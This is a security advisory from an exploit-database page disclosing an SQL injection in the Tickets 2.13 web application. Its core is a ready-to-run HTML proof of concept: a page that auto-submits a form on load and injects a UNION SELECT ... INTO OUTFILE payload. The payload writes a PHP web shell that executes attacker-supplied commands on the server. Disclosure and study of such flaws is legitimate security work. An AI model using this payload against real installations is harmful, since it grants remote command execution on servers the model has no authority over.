Tickets 2.13 SQL Injection

2011.05.26
Credit: AutoSec Tools
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

<!------------------------------------------------------------------------ # Software................Tickets 2.13 # Vulnerability...........SQL Injection # Threat Level............Critical (4/5) # Download................http://www.ticketscad.org/ # Discovery Date..........5/24/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch <john@autosectools.com> # ------------------------------------------------------------------------ # # # --Description-- # # A sql injection vulnerability in Tickets 2.13 can be exploited to # extract arbitrary data. In some environments it may be possible to # create a PHP shell. # # # --PoC--> <html> <body onload="document.forms[0].submit()"> <form method="POST" action="http://localhost/tickets/add_note.php"> <input type="hidden" name="frm_ticket_id" value="0 UNION SELECT '<?php echo system($_GET[&quot;CMD&quot;]); ?>','','','','','','','','','','','','','','','','','','','','','','','','','' FROM dual INTO OUTFILE '../../htdocs/shell.php';#" /> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top